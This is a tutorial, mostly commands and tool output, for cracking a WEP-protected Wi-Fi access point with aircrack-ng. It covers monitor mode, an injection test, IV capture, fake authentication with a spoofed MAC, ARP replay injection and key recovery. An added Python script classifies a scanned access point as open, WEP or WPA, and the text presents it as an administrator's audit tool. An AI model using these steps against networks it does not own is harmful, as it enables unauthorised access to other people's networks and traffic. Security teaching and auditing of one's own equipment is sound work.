MAC address: e8:de:27:0c:f4:ec
1. Scan the available networks and their details:
iwlist wlan1 scan | less
Cell 04 - Address: 00:4F:62:17:6B:E3
          Channel:11
          Frequency:2.462 GHz (Channel 11)
          Quality=70/70  Signal level=-15 dBm
          Encryption key:on
          ESSID:"airlive"
          Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                    9 Mb/s; 12 Mb/s; 18 Mb/s
          Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
          Mode:Master
          Extra:tsf=00000000bbb49101
          Extra: Last beacon: 60ms ago
          IE: Unknown: 00076169726C697665
          IE: Unknown: 010882848B960C121824
          IE: Unknown: 03010B
          IE: Unknown: 2A0100
          IE: Unknown: 32043048606C
          IE: Unknown: DD0700E04C01020300
Note especially the AP's MAC address and channel. To match a frequency to its channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.
2. Shut down the network card from normal operation
airmon-ng stop wlan1
3. Start the interface in monitor mode
airmon-ng start wlan1 11
where 11 is the AP's channel.
wlan1    Atheros    ath9k - [phy1]
                    (monitor mode enabled on mon0)
wlan0    Unknown    iwlwifi - [phy0]
4. Test that injection is working
aireplay-ng -9 -a 00:4F:62:17:6B:E3 wlan1
12:11:13  Waiting for beacon frame (BSSID: 00:4F:62:17:6B:E3) on channel 11
12:11:13  Trying broadcast probe requests...
12:11:13  Injection is working!
12:11:15  Found 1 AP
12:11:15  Trying directed probe requests...
12:11:15  00:4F:62:17:6B:E3 - channel: 11 - 'airlive'
12:11:15  Ping (min/avg/max): 1.105ms/6.782ms/17.021ms Power: -25.83
12:11:15  30/30: 100%
5. Start to capture the IVs. Open another console and run
airodump-ng -c 11 --bssid 00:4F:62:17:6B:E3 -w wifi_iv wlan1
where -c 11 is the AP's channel and -w wifi_iv is the prefix for the capture files holding the IVs.
6. In the meantime, you need to associate your MAC address with the AP in order to collect IVs. Use either fake authentication (see below) or the MAC address of an already-connected host.
aireplay-ng -1 6000 -o 1 -q 10 -a 00:4F:62:17:6B:E3 -h E8:DE:27:0C:F4:EC wlan1
where -1 is the fake authentication,
6000 means re-association every 6000 seconds,
-o 1 sends only one set of packets at a time; multiple sets can confuse some APs,
-q 10 keeps sending keep-alive packets every 10 s,
-h E8:DE:27:0C:F4:EC is the MAC address of your wlan1 or the MAC of another already-connected host.
7. Open another console and listen for ARP requests, re-injecting them back to the AP
aireplay-ng -3 -b 00:4F:62:17:6B:E3 -h E8:DE:27:0C:F4:EC wlan1
It will start listening for ARP requests, and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section below for tricks on generating ARPs if your screen says "got 0 ARP requests" after waiting a long time.
You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly.
If you receive a message similar to "Got a deauth/disassoc packet. Is the source mac associated?", this means you have lost association with the AP, and all your injected packets will be ignored. You must return to the fake authentication step (Step 6) and successfully associate with the AP again.
8. Run aircrack-ng to obtain the WEP key in a new console
aircrack-ng -b 00:4F:62:17:6B:E3 wifi_iv*.cap
You can also add -n 64 if you know the key is only 64 bits long. This uses the very quick PTW method, which, however, works only as long as you are able to collect ARP request/reply packets.
To use the FMS/KoreK method instead, add the -K switch.
You can run this while packets are still being generated. In a short time, the WEP key will be calculated and presented. For FMS/KoreK, you will need approximately 250,000 IVs for 64-bit and 1,500,000 IVs for 128-bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128-bit keys. These figures are very approximate, and there are many variables affecting how many IVs you actually need to crack the WEP key.
Aircrack-ng 1.1

[00:06:18] Tested 4995588 keys (got 328514 IVs)

KB    depth   byte(vote)
 0    0/  1   AB(  93) 20(  15) 48(  15) 58(  15) AE(  15)
 1    0/  3   CD(  84) 75(  63) 43(  47) 55(  26) 09(  22)
 2    0/  2   EF(  71) 8D(  70) B6(  30) 2F(  15) 37(  15)
 3    0/  1   12( 130) 01(  31) 7C(  30) 26(  29) E7(  28)

KEY FOUND! [ AB:CD:EF:12:34 ]
Decrypted correctly: 100%
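As an added example (not part of this tutorial), here is a Python script that parses the iwlist cell from step 1 and decodes its "IE: Unknown" information elements to tell whether an AP is still running WEP, the only mode the PTW/FMS attacks above apply to, so an administrator can audit their own equipment from a single scan. The cell text is the page's own output embedded inline; the 2.4 GHz channel-to-frequency formula and the RSN (0x30) / WPA vendor (OUI 00:50:F2 type 1) element IDs are standard 802.11 values, not something the page states.

```python
import re

# Constructed from the `iwlist wlan1 scan` cell shown in step 1 of the tutorial.
IWLIST_CELL = """\
Cell 04 - Address: 00:4F:62:17:6B:E3
          Channel:11
          Frequency:2.462 GHz (Channel 11)
          Encryption key:on
          ESSID:"airlive"
          IE: Unknown: 00076169726C697665
          IE: Unknown: 010882848B960C121824
          IE: Unknown: 03010B
          IE: Unknown: 2A0100
          IE: Unknown: 32043048606C
          IE: Unknown: DD0700E04C01020300
"""

WPA_OUI_TYPE = bytes.fromhex("0050F201")   # Microsoft OUI + type 1 = WPA1 vendor element
SSID_ID, DS_ID, RSN_ID, VENDOR_ID = 0x00, 0x03, 0x30, 0xDD

def channel_to_mhz(ch):
    """2.4 GHz channel number -> centre frequency in MHz (channel 14 is the exception)."""
    return 2484 if ch == 14 else 2407 + 5 * ch

def classify_cell(text):
    """Parse one iwlist cell and classify its security as open, WEP or WPA/WPA2."""
    bssid = re.search(r"Address: ([0-9A-F:]{17})", text).group(1)
    key_on = "Encryption key:on" in text
    info = {"bssid": bssid, "ssid": None, "channel": None, "rsn": False, "wpa": False}
    for hexstr in re.findall(r"IE: Unknown: ([0-9A-Fa-f]+)", text):
        raw = bytes.fromhex(hexstr)
        ie_id, length, body = raw[0], raw[1], raw[2:]   # TLV: id, length, payload
        if length != len(body):
            continue                                     # truncated element, skip it
        if ie_id == SSID_ID:
            info["ssid"] = body.decode("ascii", "replace")
        elif ie_id == DS_ID:
            info["channel"] = body[0]                    # DS Parameter Set = channel
        elif ie_id == RSN_ID:
            info["rsn"] = True                           # WPA2/RSN advertised
        elif ie_id == VENDOR_ID and body.startswith(WPA_OUI_TYPE):
            info["wpa"] = True                           # WPA1 advertised
    if not key_on:
        info["security"] = "open"
    elif info["rsn"] or info["wpa"]:
        info["security"] = "WPA/WPA2"
    else:
        info["security"] = "WEP"   # key required but no RSN/WPA element: legacy WEP
    info["freq_mhz"] = channel_to_mhz(info["channel"]) if info["channel"] else None
    return info

if __name__ == "__main__":
    print(classify_cell(IWLIST_CELL))
```

The "airlive" cell carries no RSN or WPA element, so it is reported as WEP on channel 11 (2462 MHz), which is exactly the configuration this tutorial recovers a key from.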
Generating ARPs: in order for this tutorial to work, you must receive at least one ARP packet. On your home network, here is an easy way to generate an ARP packet. On a wired or wireless PC, ping a non-existent IP on your home LAN. A wired PC means a PC connected to your LAN via an Ethernet cable. Let's say your home LAN address space is 192.168.1.1 through 192.168.1.254. Pick an IP between 1 and 254 which is not assigned to a network device. For example, if the IP 192.168.1.213 is not being used, then "ping 192.168.1.213". This will cause an ARP request to be broadcast via your wireless access point, and in turn this will kick off the reinjection of packets by aireplay-ng.